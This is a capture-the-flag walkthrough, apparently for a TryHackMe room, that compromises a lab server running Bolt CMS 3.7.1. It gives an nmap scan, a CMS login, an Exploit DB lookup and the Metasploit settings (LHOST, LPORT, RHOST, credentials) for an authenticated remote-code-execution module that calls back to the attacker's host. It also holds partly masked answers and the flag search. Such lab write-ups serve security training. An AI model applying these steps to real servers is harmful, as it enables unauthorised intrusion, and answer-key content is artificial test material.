-
Start the machine
no answer needed -
What port number has a web server with a CMS running?
nmap -sV <TARGET_IP>
8000
-
What is the username we can find in the CMS?
bolt
-
What is the password we can find for the username?
*****d*in123
-
What version of the CMS is installed on the server? (Ex: Name 1.1.1)
- Log in to the page <TARGET_IP>/bolt with the username and password found previously.
Bolt 3.7.1
-
There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?
- Search on Google for "Bolt RCE Exploit DB"
***2*
-
Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)
msfconsole
search bolt
use *exploit/unix/******************************
-
Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
no answer needed
set LHOST <YOUR_IP>
set LPORT 1234
set RHOST <TARGET_IP>
set USERNAME bolt
set PASSWORD ************
-
Look for flag.txt inside the machine.
exploit
cat $(find / | grep flag.txt)
THM{***************************}